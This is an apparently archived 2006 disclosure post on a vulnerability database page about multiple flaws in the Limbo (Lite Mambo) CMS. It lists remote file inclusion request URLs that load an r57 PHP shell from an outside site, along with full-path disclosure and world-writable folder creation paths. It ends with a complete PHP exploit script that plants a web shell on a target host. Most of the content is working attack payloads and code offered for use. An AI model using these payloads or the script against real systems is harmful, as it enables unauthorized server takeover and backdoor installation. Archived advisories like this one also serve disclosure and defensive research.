Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14309
HistorySep 18, 2006 - 12:00 a.m.

Limbo - Lite Mambo CMS Multiple Vulnerabilities

2006-09-1800:00:00
vulners.com
24

Hello

Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including - Full path - make php shell - and create folder with 0777 permissions)

Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [email protected]

/*******************************************************/
Remote File Including

classes/adodbt/sql.php?classes_dir=http://www.soqor.net/tools/r57.txt?

/*******************************************************/

Make online php shell

admin/components/com_fm/fm.install.php?lm_absolute_path=…/…/…/&install_dir=http://www.soqor.net/tools/r57.txt?
or :-
components/com_fm/fm.install.php?lm_absolute_path=…/…/&install_dir=http://www.soqor.net/tools/r57.txt?

the shell link will be :
admin/components/com_fm/lang/fm.english.php

/*******************************************************/

Full Path :-

includes/metadata.php
editor/tiny_mce/plugins/imanager/imanager.php
components/com_fm/fm.install.php
admin/auth.php
admin/components/com_fm/fm.install.php
admin/components/com_gallery/gallery.install.php
admin/components/com_start/admin.start.news.php
admin/components/com_start/admin.start.html.php?lm_absolute_path=…/…/…/

it can be usefull in the fallowing vulnerabilities

/*******************************************************/
Create A new Folder With 0777 Permission

      • You Can Change the link and create your own folders , see the source code …

admin/components/com_gallery/gallery.install.php?absolute_path=…/…/…/

File dir:
images/gallery/thumbs/

admin/components/com_gositemap/gositemap.install.php?lm_absolute_path=…/…/
File dir:
admin/feed

admin/components/com_sitemap/sitemap.install.php?lm_absolute_path=…/
File dir:
admin/components/feed

/*******************************************************/

WwW.SoQoR.NeT

Exploit:-
[code]
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* Limbo Portal Multiple vulnerabilities
/* This exploit should Create a PHP shell
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/
print_r('
/
/
/
Limbo Portal Creat PHP shell exploit /
/
by HACKERS PAL <[email protected]> /
/
site: http://www.soqor.net /');
if ($argc<2) {
print_r('
/
/
/
Usage: php '.$argv[0].' host
/
Example: /
/
php '.$argv[0].' http://localhost/
/
***/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1];
$exploit="components/com_fm/fm.install.php?lm_absolute_path=…/…/&install_dir=http://www.soqor.net/tools/r57.txt?&quot;;
$page=$url.$exploit;
Function get_page($url)
{

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

 $page = get_page&#40;$page&#41;;

 if&#40;!eregi&#40;&quot;Warning&quot;,$page&#41;&#41;
 {
   Die&#40;&quot;&#92;n[+] Exploit Finished&#92;n[+] Go To : &quot;.$url.&quot;admin/components/com_fm/lang/fm.english.php&#92;n[+] You Got Your Own PHP Shell&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
         }
         Else
         {
            Die&#40;&quot;&#92;n[-] Exploit Failed&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;
            }

?>
[/code]